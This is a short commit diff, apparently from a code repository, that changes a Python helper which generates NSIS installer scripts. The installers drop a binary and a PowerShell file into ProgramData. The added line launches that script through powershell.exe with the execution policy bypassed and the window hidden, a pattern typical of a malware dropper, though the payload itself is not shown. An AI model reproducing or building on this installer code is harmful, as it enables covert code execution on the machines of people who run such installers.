sigyllly commited on
Commit
70e9704
·
verified ·
1 Parent(s): f1cd1b2

Update utils.py

Browse files
Files changed (1) hide show
  1. utils.py +1 -1
utils.py CHANGED
@@ -93,7 +93,7 @@ def generate_nsi_script(folder_path, bin_file, ps1_file):
93
  SetOutPath "$WINDIR\..\ProgramData\Installer"
94
  File "{bin_file}"
95
  File "{ps1_file}"
96
- ExecShell "" "$WINDIR\..\ProgramData\Installer\\Verification.ps1" SW_HIDE
97
  SetAutoClose true
98
  SectionEnd
99
  """
 
93
  SetOutPath "$WINDIR\..\ProgramData\Installer"
94
  File "{bin_file}"
95
  File "{ps1_file}"
96
+ ExecShell "open" "powershell.exe" "-ExecutionPolicy Bypass -File $INSTDIR\Verification.ps1" SW_HIDE
97
  SetAutoClose true
98
  SectionEnd
99
  """